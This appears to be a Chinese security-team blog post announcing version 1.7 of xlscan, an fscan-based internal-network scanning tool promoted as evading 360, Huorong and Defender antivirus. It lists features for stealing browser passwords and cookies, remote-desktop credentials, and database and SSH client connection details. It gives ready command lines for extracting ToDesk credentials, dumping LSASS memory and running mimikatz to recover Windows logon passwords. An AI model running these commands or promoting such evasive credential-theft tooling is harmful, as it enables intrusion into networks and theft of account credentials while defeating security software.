新增网段可达探测 | 基于fscan 过360核晶、火绒的xlscan v1.7 发布！

现在只对常读和星标的公众号才展示大图推送，建议大家能把星落安全团队“设为星标”，否则可能就看不到了啦！

版本更新 v1.7：

• 新增内网网段可达探测功能

• 增加poc至fscan2.0.1版本

• firefox、Edge和chromium内核浏览器，提取浏览记录、下载记录、书签、cookie、用户密码。

• 提取向日葵（支持最新版本） 获取id、密码、配置信息

• ToDesk 获取id、密码、配置信息

• Navicat 获取数据库连接信息

• DBeaver 获取数据库连接信息

• FinalShell 获取连接信息

• Xshell和Xftp 获取连接信息

• FileZilla 获取连接信息

• winscp 获取连接信息

• 敏感信息文件搜索

• 新增导出Lsass 内存功能

• 新增赋予360核晶、火绒、defender免杀效果。

工具使用

探测内网可达网段

基于netspy代码重构为fscan形式，当我们进入内网后想要扩大战果，那我们可能首先想知道当前主机能通哪些内网段。

 支持五种探测形式  -icmpspy,    使用icmp协议探测  -pingspy,    使用ping命令探测  -arpspy,     使用arp协议探测  -tcpspy,     使用tcp协议探测  -udpspy,     使用udp协议探测

扩充POC

1.6版本在fscan2.0.1最新版本387个POC 。

帮助说明

为了更好的免杀效果，xlscan取消了帮助文档信息，导致许多师傅不懂有些命令如何执行，因此新增离线版帮助文档。

使用说明

使用方法与Fscan相同，但每次使用时。请使用 -k 参数来指定密码。

1.正常扫描IP地址信息

xlscan.exe -k 123 -h 192.168.1.1/24

2. 提取Todesk账号密码信息

xlscan.exe -k 123 --todesk

3.提取向日葵账号密码信息

4.获取finalshell相关信息

5.获取浏览器相关信息

6.导出 Lsass.exe 内存功能

xlscan.exe -k 123 -rls all 

然后对生成的dmp文件进行解密

xlscan.exe -k 123 -rld 1726670123424.dmp

最后使用mimikatz进行解密，即可得到windows账号相关信息。

mimikatz.exe "sekurlsa::minidump  1726671241489.dmp" "sekurlsa::logonPasswords full" "exit"

还有很多功能就不一一演示了，其余功能自行测试！

物理机360：

火绒：